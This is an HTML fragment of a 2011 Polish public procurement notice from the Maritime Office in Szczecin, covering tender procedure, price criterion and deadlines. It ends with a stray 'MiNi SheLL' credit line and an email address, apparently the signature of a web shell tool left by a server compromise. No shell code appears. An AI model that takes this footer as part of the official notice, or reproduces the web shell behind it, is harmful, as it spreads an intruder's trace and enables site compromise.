<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ums.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Morski w Szczecinie, Zespół ds. Zamówień Publicznych, pokój nr 110, Plac Batorego 4, 70-207 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2011 godzina 10:30, miejsce: Urząd Morski w Szczecinie, Zespół ds. Zamówień Publicznych, pokój nr 110, Plac Batorego 4, 70-207 Szczecin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com